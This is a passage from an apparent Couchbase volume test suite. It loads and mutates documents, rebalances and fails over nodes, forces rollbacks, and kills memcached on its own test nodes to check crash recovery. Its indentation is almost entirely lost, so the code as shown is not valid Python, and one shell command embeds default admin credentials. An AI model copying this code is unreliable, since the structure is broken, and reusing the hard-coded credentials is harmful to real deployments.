self.log.debug("Total Disk usage for seqTree is {}MB".format(seqTree))
return kvstore, wal, keyTree, seqTree
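    # Background crash loop: every 60-120s kill memcached (or gracefully
    # restart couchbase) on the given nodes, wait for warmup, and stop once
    # self.stop_crash is set or self.crashes iterations have run.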
def crash_thread(self, nodes=None, num_kills=1, graceful=False):
self.stop_crash = False
self.crash_count = 0
if not nodes:
nodes = self.cluster.nodes_in_cluster
while not self.stop_crash:
self.get_memory_footprint()
sleep = random.randint(60, 120)
self.sleep(sleep,
"Iteration:{} waiting to kill memc on all nodes".
format(self.crash_count))
self.kill_memcached(nodes, num_kills=num_kills,
graceful=graceful, wait=True)
self.crash_count += 1
if self.crash_count > self.crashes:
self.stop_crash = True
self.sleep(300)
def kill_memcached(self, servers=None, num_kills=1,
graceful=False, wait=True):
if not servers:
servers = self.cluster.nodes_in_cluster
for _ in xrange(num_kills):
self.sleep(5, "Sleep for 5 seconds between continuous memc kill")
for server in servers:
shell = RemoteMachineShellConnection(server)
if graceful:
shell.restart_couchbase()
else:
shell.kill_memcached()
shell.disconnect()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
if wait:
for server in servers:
self.check_warmup_complete(server)
def check_dump(self):
count = 1
shells = list()
for server in self.cluster.nodes_in_cluster:
shells.append(RemoteMachineShellConnection(server))
while self.check_dump_thread:
self.log.debug("Checking crashes {}".format(count))
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.check_dump_thread = False
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
for shell in shells:
for bucket in self.cluster.buckets:
output = shell.execute_command(
'/opt/couchbase/bin/cbstats localhost:11210 memory \
-u Administrator -p password -b {} | grep -e \
ep_arena:resident -e ep_arena:allocated \
-e mem_used:'.format(bucket.name))[0]
self.log.debug("{}: {}".format(shell.ip,
output[0].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[1].replace(" ", "")
.strip()))
self.log.debug("{}: {}".format(shell.ip,
output[2].replace(" ", "")
.strip()))
self.sleep(60)
count += 1
for shell in shells:
shell.disconnect()
def check_warmup_complete(self, server):
for bucket in self.cluster.buckets:
start_time = time.time()
result = self.bucket_util._wait_warmup_completed(
[server],
                bucket,
wait_time=self.wait_timeout * 20)
if not result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertTrue(result, "Warm-up failed in %s seconds"
% (self.wait_timeout * 20))
else:
self.log.info("Bucket:%s warm-up completed in %s." %
(bucket.name, str(time.time() - start_time)))
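    # Force vBucket rollbacks: stop persistence on one node, load
    # mem_only_items docs targeted at that node's active vBuckets, wait for
    # the expected disk-queue sizes, then kill memcached so the unpersisted
    # mutations are discarded, and verify item counts return to final_items.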
def perform_rollback(self, start=None, mem_only_items=100000,
doc_type="create", kill_rollback=1):
if not self.rollback:
return
rollbacks = self.input.param("rollbacks", 2)
# mem_only_items = random.randint(mem_only_items, mem_only_items*2)
_iter = 0
self.gen_create, self.gen_update, self.gen_delete, self.gen_expiry = [None]*4
while _iter < rollbacks:
self.PrintStep("Rollback with %s: %s" % (doc_type,
str(_iter)))
tasks_info = dict()
node = self.cluster.nodes_in_cluster[0]
# Stopping persistence on NodeA
mem_client = MemcachedClientHelper.direct_client(
node, self.cluster.buckets[0])
mem_client.stop_persistence()
shell = RemoteMachineShellConnection(node)
cbstats = Cbstats(shell)
target_vbucket = cbstats.vbucket_list(self.cluster.buckets[0].
name)
shell.disconnect()
gen_docs = doc_generator(
self.key_prefix,
start, mem_only_items,
doc_size=self.doc_size,
doc_type=self.doc_type,
target_vbucket=target_vbucket,
vbuckets=self.cluster.vbuckets,
key_size=self.key_size,
randomize_doc_size=self.randomize_doc_size,
randomize_value=self.randomize_value,
mix_key_size=self.mix_key_size)
if doc_type == "create":
self.gen_create = gen_docs
if doc_type == "update":
self.gen_update = gen_docs
if doc_type == "delete":
self.gen_delete = gen_docs
if doc_type == "expiry":
self.gen_expiry = gen_docs
if self.maxttl == 0:
self.maxttl = self.input.param("maxttl", 10)
doc_type = "update"
task = self.perform_load(wait_for_load=False)
self.wait_for_doc_load_completion(task, wait_for_stats=False)
ep_queue_size_map = {node: mem_only_items *
self.num_scopes *
self.num_collections}
vb_replica_queue_size_map = {node: 0}
for server in self.cluster.nodes_in_cluster:
if server.ip != node.ip:
ep_queue_size_map.update({server: 0})
vb_replica_queue_size_map.update({server: 0})
for bucket in self.cluster.buckets:
self.bucket_util._wait_for_stat(bucket, ep_queue_size_map,
timeout=3600)
self.bucket_util._wait_for_stat(
bucket,
vb_replica_queue_size_map,
stat_name="vb_replica_queue_size",
timeout=3600)
self.kill_memcached(num_kills=kill_rollback)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
self.print_stats()
_iter += 1
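    # Repeatedly stop an in-flight rebalance at roughly 20% progress
    # increments and resume it with a fresh rebalance call; returns the task
    # for the last resumed rebalance.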
def pause_rebalance(self):
rest = RestConnection(self.cluster.master)
i = 1
self.sleep(10, "Let the rebalance begin!")
expected_progress = 20
while expected_progress < 100:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Stop the rebalance")
stopped = rest.stop_rebalance(wait_timeout=self.wait_timeout / 3)
self.assertTrue(stopped, msg="Unable to stop rebalance")
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
self.sleep(10, "Rebalance % ={}. Let the rebalance begin!".
format(expected_progress))
i += 1
return rebalance_task
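    # Let the rebalance advance in 20% steps and, at each step, inject the
    # given error (default kill_memcached), recover from it, and restart the
    # rebalance if it did not complete; returns the latest rebalance task.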
def abort_rebalance(self, rebalance, error_type="kill_memcached"):
self.sleep(30, "Let the rebalance begin!")
rest = RestConnection(self.cluster.master)
i = 1
expected_progress = 20
rebalance_task = rebalance
while expected_progress < 80:
expected_progress = 20 * i
reached = RestHelper(rest).rebalance_reached(expected_progress,
wait_step=10)
self.assertTrue(reached, "Rebalance failed or did not reach {0}%"
.format(expected_progress))
if not RestHelper(rest).is_cluster_rebalanced():
self.log.info("Abort rebalance")
self._induce_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.sleep(60, "Sleep after error introduction")
self._recover_from_error(error_type)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
try:
self.task.jython_task_manager.get_task_result(rebalance_task)
except RebalanceFailedException:
pass
if rebalance.result:
self.log.error("Rebalance passed/finished which is not expected")
self.log.info("Rebalance % after rebalance finished = {}".
format(expected_progress))
break
else:
self.log.info("Restarting Rebalance after killing at {}".
format(expected_progress))
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], self.servs_out,
retry_get_process_num=3000)
self.sleep(120, "Let the rebalance begin after abort")
self.log.info("Rebalance % = {}".
format(self.rest._rebalance_progress()))
i += 1
return rebalance_task
def PrintStep(self, msg=None):
print("\n")
print("#"*60)
print("#")
print("# %s" % msg)
print("#")
print("#"*60)
print("\n")
def ClusterOpsVolume(self):
#######################################################################
def end_step_checks(tasks):
self.wait_for_doc_load_completion(tasks)
self.data_validation()
self.print_stats()
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.stop_crash = True
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(
result,
"CRASH | CRITICAL | WARN messages found in cb_logs")
self.loop = 0
while self.loop < self.iterations:
'''
Create sequential: 0 - 10M
Final Docs = 10M (0-10M, 10M seq items)
'''
self.create_perc = 100
self.PrintStep("Step 3: Create %s items sequentially" % self.num_items)
self.generate_docs(doc_ops=["create"],
create_start=self.start, create_end=self.num_items)
self.perform_load(validate_data=False)
self.PrintStep("Step 3.1: Update %s RandonKey keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
This Step:
Create Random: 0 - 20M
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.PrintStep("Step 4: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
create_start=self.end, create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Update Sequential: 0 - 10M
Update Random: 0 - 20M to create 50% fragmentation
Final Docs = 30M (0-20M, 20M Random)
Nodes In Cluster = 3
'''
self.update_perc = 100
self.PrintStep("Step 5: Update %s random keys to create 50 percent fragmentation" % str(self.num_items))
self.generate_docs(doc_ops=["update"],
update_start=self.start, update_end=self.end)
self.perform_load(validate_data=False)
self.mutation_perc = self.input.param("mutation_perc", 100)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 20M
This Step:
Create Random: 20 - 30M
Delete Random: 10 - 20M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 20-30M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.create_perc = 25
self.update_perc = 25
self.delete_perc = 25
self.expiry_perc = 25
self.read_perc = 25
self.PrintStep("Step 6: Rebalance in with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 20 - 30M
This Step:
Create Random: 30 - 40M
Delete Random: 20 - 30M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 30-40M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 7: Rebalance Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=0, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 30 - 40M
This Step:
Create Random: 40 - 50M
Delete Random: 30 - 40M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 4
Final Docs = 30M (Random: 0-10M, 40-50M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 8: Rebalance In_Out with Loading of docs")
rebalance_task = self.rebalance(nodes_in=2, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 40 - 50M
This Step:
Create Random: 50 - 60M
Delete Random: 40 - 50M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 4 (SWAP)
Final Docs = 30M (Random: 0-10M, 50-60M, Sequential: 0-10M)
Nodes In Cluster = 4
'''
self.PrintStep("Step 9: Swap with Loading of docs")
rebalance_task = self.rebalance(nodes_in=1, nodes_out=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks = self.perform_load(wait_for_load=False)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 50 - 60M
This Step:
Create Random: 60 - 70M
Delete Random: 50 - 60M
Update Random: 0 - 10M
Nodes In Cluster = 4 -> 3
Final Docs = 30M (Random: 0-10M, 60-70M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 10: Failover a node and RebalanceOut that node \
with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster, self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
# Mark Node for failover
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(10)
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
self.nodes = self.rest.node_statuses()
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.rest.rebalance(otpNodes=[node.id for node in self.nodes],
ejectedNodes=[self.chosen[0].id])
self.assertTrue(self.rest.monitorRebalance(), msg="Rebalance failed")
servs_out = [node for node in self.cluster.servers
if node.ip == self.chosen[0].ip]
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
self.available_servers += servs_out
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.servers[:self.nodes_in + self.nodes_init],
self.cluster.buckets, path=None)
nodes = self.cluster_util.get_nodes_in_cluster(self.cluster)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=nodes, buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 60 - 70M
This Step:
Create Random: 70 - 80M
Delete Random: 60 - 70M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 70-80M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 11: Failover a node and FullRecovery\
that node")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.assertTrue(self.rest.monitorRebalance(), msg="Failover -> Rebalance failed")
# Mark Node for full recovery
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="full")
self.sleep(60, "Waiting for full recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 70 - 80M
This Step:
Create Random: 80 - 90M
Delete Random: 70 - 80M
Update Random: 0 - 10M
Nodes In Cluster = 3 -> 3
Final Docs = 30M (Random: 0-10M, 80-90M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 12: Failover a node and DeltaRecovery that \
node with loading in parallel")
self.std_vbucket_dist = self.input.param("std_vbucket_dist", None)
std = self.std_vbucket_dist or 1.0
prev_failover_stats = self.bucket_util.get_failovers_logs(
self.cluster.nodes_in_cluster, self.cluster.buckets)
disk_replica_dataset, disk_active_dataset = self.bucket_util.\
get_and_compare_active_replica_data_set_all(
self.cluster.nodes_in_cluster,
self.cluster.buckets,
path=None)
self.rest = RestConnection(self.cluster.master)
self.nodes = self.cluster_util.get_nodes(self.cluster.master)
self.chosen = self.cluster_util.pick_nodes(self.cluster.master,
howmany=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
tasks_info = self.data_load()
# Mark Node for failover
self.success_failed_over = self.rest.fail_over(self.chosen[0].id,
graceful=True)
self.sleep(60, "Waiting for failover to finish and settle down cluster.")
self.rest.monitorRebalance()
if self.success_failed_over:
self.rest.set_recovery_type(otpNode=self.chosen[0].id,
recoveryType="delta")
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
self.sleep(60, "Waiting for delta recovery to finish and settle down cluster.")
rebalance_task = self.task.async_rebalance(
self.cluster.nodes_in_cluster, [], [],
retry_get_process_num=3000)
self.set_num_writer_and_reader_threads(
num_writer_threads="disk_io_optimized",
num_reader_threads="disk_io_optimized")
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
self.bucket_util.compare_failovers_logs(
self.cluster,
prev_failover_stats,
self.cluster.nodes_in_cluster,
self.cluster.buckets)
self.bucket_util.data_analysis_active_replica_all(
disk_active_dataset, disk_replica_dataset,
self.cluster.nodes_in_cluster,
self.cluster.buckets, path=None)
self.bucket_util.vb_distribution_analysis(
self.cluster,
servers=self.cluster.nodes_in_cluster,
buckets=self.cluster.buckets,
num_replicas=self.num_replicas,
std=std, total_vbuckets=self.cluster.vbuckets)
###################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 80 - 90M
This Step:
Create Random: 90 - 100M
Delete Random: 80 - 90M
Update Random: 0 - 10M
Replica 1 - > 2
Final Docs = 30M (Random: 0-10M, 90-100M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 13: Updating the bucket replica to 2")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=2)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
rebalance_task = self.rebalance(nodes_in=1, nodes_out=0)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
####################################################################
'''
Existing:
Sequential: 0 - 10M
Random: 0 - 10M, 90 - 100M
This Step:
Create Random: 100 - 110M
Delete Random: 90 - 100M
Update Random: 0 - 10M
Replica 2 - > 1
Final Docs = 30M (Random: 0-10M, 100-110M, Sequential: 0-10M)
Nodes In Cluster = 3
'''
self.PrintStep("Step 14: Updating the bucket replica to 1")
bucket_helper = BucketHelper(self.cluster.master)
for i in range(len(self.cluster.buckets)):
bucket_helper.change_bucket_props(
self.cluster.buckets[i], replicaNumber=1)
self.generate_docs(doc_ops=["update", "delete", "read", "create"])
self.set_num_writer_and_reader_threads(
num_writer_threads=self.new_num_writer_threads,
num_reader_threads=self.new_num_reader_threads)
rebalance_task = self.task.async_rebalance(self.cluster.nodes_in_cluster,
[], [],
retry_get_process_num=3000)
tasks_info = self.data_load()
self.task.jython_task_manager.get_task_result(rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
end_step_checks(tasks_info)
#######################################################################
self.PrintStep("Step 15: Flush the bucket and \
start the entire process again")
self.loop += 1
if self.loop < self.iterations:
# Flush the bucket
result = self.bucket_util.flush_all_buckets(self.cluster)
self.assertTrue(result, "Flush bucket failed!")
self.sleep(600)
if len(self.cluster.nodes_in_cluster) > self.nodes_init:
nodes_cluster = self.cluster.nodes_in_cluster[:]
nodes_cluster.remove(self.cluster.master)
servs_out = random.sample(
nodes_cluster,
int(len(self.cluster.nodes_in_cluster)
- self.nodes_init))
rebalance_task = self.task.async_rebalance(
self.cluster.servers[:self.nodes_init], [], servs_out,
retry_get_process_num=3000)
self.task.jython_task_manager.get_task_result(
rebalance_task)
self.assertTrue(rebalance_task.result, "Rebalance Failed")
self.available_servers += servs_out
self.cluster.nodes_in_cluster = list(
set(self.cluster.nodes_in_cluster) - set(servs_out))
else:
self.log.info("Volume Test Run Complete")
self.init_doc_params()
def ReadHeavyWorkload(self):
#######################################################################
self.key_prefix = "random_keys"
self.loop = 1
self.skip_read_on_error = True
self.suppress_error_table = True
self.doc_ops = ["create"]
self.create_perc = 100
for bucket in self.cluster.buckets:
self.PrintStep("Step 1: Create %s items" % self.num_items)
self.generate_docs(doc_ops=self.doc_ops)
self.perform_load(validate_data=False)
dgm = self.get_bucket_dgm(bucket)
while self.dgm and dgm > self.dgm:
self.generate_docs(doc_ops=self.doc_ops)
dgm = self.get_bucket_dgm(bucket)
self.perform_load(validate_data=False)
self.doc_ops = ["read"]
self.read_perc = 100
self.generate_docs(doc_ops=self.doc_ops)
self.data_validation()
while self.loop <= self.iterations:
task = self.perform_load(wait_for_load=False, validate_data=False)
self.wait_for_doc_load_completion(task)
result = self.check_coredump_exist(self.cluster.nodes_in_cluster)
if result:
self.PrintStep("CRASH | CRITICAL | WARN messages found in cb_logs")
if self.assert_crashes_on_load:
self.task.jython_task_manager.abort_all_tasks()
self.assertFalse(result)
self.bucket_util.print_bucket_stats(self.cluster)
self.print_crud_stats()
for bucket in self.cluster.buckets:
self.get_bucket_dgm(bucket)
if bucket.storageBackend == Bucket.StorageBackend.magma:
self.get_magma_disk_usage(bucket)
def MB_43460(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create")
self.perform_load(validate_data=False)
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_scopes = self.num_scopes
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
drop += 1
self.num_collections = self.num_collections - drop
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
self.final_items = self.final_items * (self.num_collections)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(self.final_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.final_items,
timeout=3600)
if self.end_step == 13:
exit(13)
#######################################################################
self.PrintStep("Step 14: Normal Rollback with deletes")
'''
Final Docs = 30M (0-20M, 10M Random)
'''
mem_only_items = self.input.param("rollback_items", 100000)
self.perform_rollback(0, mem_only_items, doc_type="delete")
if self.end_step == 14:
exit(14)
def MB_42652(self):
self.loop = 1
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
creates: 0 - 10M
Final Docs = 20M (0-20M)
'''
self.create_perc = 200
self.PrintStep("Step 4: Load %s items, sequential keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 4:
exit(4)
'''
fragmentation at this time: 0, total data: 2X, stale: 0
'''
#######################################################################
'''
update: 0 - 1M * 10
Final Docs = 20M (0-20M)
'''
self.update_perc = 100
self.PrintStep("Step 5: Update the first set of %s percent (%s) items \
%s times" % (str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
_iter = 0
while _iter < self.step_iterations:
self.PrintStep("Step 5.%s: Update the first set of %s percent (%s) \
items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update")
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 5:
exit(5)
'''
fragmentation at this time: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_prefix = "random_keys"
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" %
str(self.num_items*self.create_perc/100))
self.generate_docs(doc_ops="create",
create_start=0,
create_end=self.num_items)
self.perform_load(crash=False, validate_data=True)
self.key_prefix = temp
'''
fragmentation: 50, total data: 3X, stale: X
'''
#######################################################################
'''
Update Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
_iter = 0
self.update_perc = 100
self.key_prefix = "random_keys"
self.PrintStep("Step 8: Update all %s random items %s times" %
(str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 8.%s: Update all %s random items %s times" %
(str(_iter),
str(self.num_items*self.update_perc/100),
str(self.step_iterations)))
self.generate_docs(doc_ops="update",
update_start=self.start,
update_end=self.end*self.update_perc/100)
self.perform_load(crash=False, validate_data=True)
_iter += 1
self.key_prefix = temp
if self.end_step == 8:
exit(8)
'''
fragmentation: 50, total data: 3X, stale: 1.5X
'''
#######################################################################
self.PrintStep("Step 13: Drop a collection")
total_collections = self.num_collections
total_items = self.final_items
drop = 0
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
drop = 0
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.drop_collection(self.cluster.master,
bucket,
scope,
collection)
bucket.scopes[scope].collections.pop(collection)
self.sleep(random.randint(1, 4))
drop += 1
if drop % (total_collections/4) == 0:
self.sleep(60, "Sleep after dropping half collections...")
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets)
total_items = self.final_items * (total_collections - drop)/total_collections
self.log.info("Expected items after dropping collections: {}".
format(total_items))
self.bucket_util.verify_stats_all_buckets(self.cluster,
total_items,
timeout=3600)
self.final_items = total_items
self.num_collections = self.num_collections - drop
if self.end_step == 13:
exit(13)
#######################################################################
for bucket in self.cluster.buckets:
for scope in bucket.scopes.keys():
for i in range(1, total_collections, 2):
collection = self.collection_prefix + str(i)
self.bucket_util.create_collection(self.cluster.master,
bucket,
scope,
{"name": collection})
self.num_collections += 1
self.sleep(0.5)
self.bucket_util.flush_all_buckets(self.cluster)
self.init_doc_params()
self.sleep(10, "Iteration %s completed successfully !!!" % self.loop)
self.loop += 1
if self.end_step == 18:
exit(18)
def SteadyStateVolume(self):
check_dump_th = threading.Thread(target=self.check_dump)
check_dump_th.start()
self.loop = 1
self.PrintStep("Step 3: Create %s items and checkout fragmentation" % str(self.num_items))
self.create_perc = 100
self.generate_docs(doc_ops=["create"],
create_start=0,
create_end=self.num_items)
self.perform_load(validate_data=False)
self.generate_docs(doc_ops=["create"],
create_start=self.end,
create_end=self.end+self.num_items)
self.perform_load(validate_data=False)
if self.end_step == 2:
exit(2)
while self.loop <= self.iterations:
#######################################################################
'''
creates: 0 - 10M
deletes: 0 - 10M
Final Docs = 0
'''
self.PrintStep("Step 4: Starting parallel cruds")
self.create_perc, self.read_perc, self.update_perc, self.delete_perc = [100/len(self.doc_ops)]*4
self.generate_docs()
self.perform_load(validate_data=True)
if self.end_step == 3:
exit(3)
'''
fragmentation at this time: 0
'''
#######################################################################
'''
|----READ----|----UPDATE----|----DELETE----|----CREATE----|
25% 25% 25% 25%
Reverse Update: 10M - 9M
Final Docs = 20M (0-20M)
'''
_iter = 0
self.update_perc = 100
self.PrintStep("Step 6: Reverse Update last set of %s percent (%s-%s) \
items %s times" % (str(self.update_perc), str(self.num_items-1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
while _iter < self.step_iterations:
self.PrintStep("Step 6.%s: Reverse Update last set of %s percent \
(%s-%s) items %s times" % (str(_iter), str(self.update_perc),
str(self.num_items+1),
str(self.num_items+1 -
self.num_items),
str(self.step_iterations)))
start = -self.update_end + 1
end = -self.update_start
self.generate_docs(doc_ops=["update"],
update_start=start,
update_end=end)
self.perform_load(crash=False, validate_data=True)
_iter += 1
if self.end_step == 6:
exit(6)
'''
fragmentation: 50, total data: 2X, stale: X
'''
#######################################################################
'''
Create Random: 0 - 10M
Final Docs = 30M (0-20M, 10M Random)
'''
temp = self.key_prefix
self.key_type = "RandomKey"
self.create_perc = 100
self.PrintStep("Step 7: Create %s random keys" % str(self.num_items))
self.generate_docs(doc_ops=["create"],
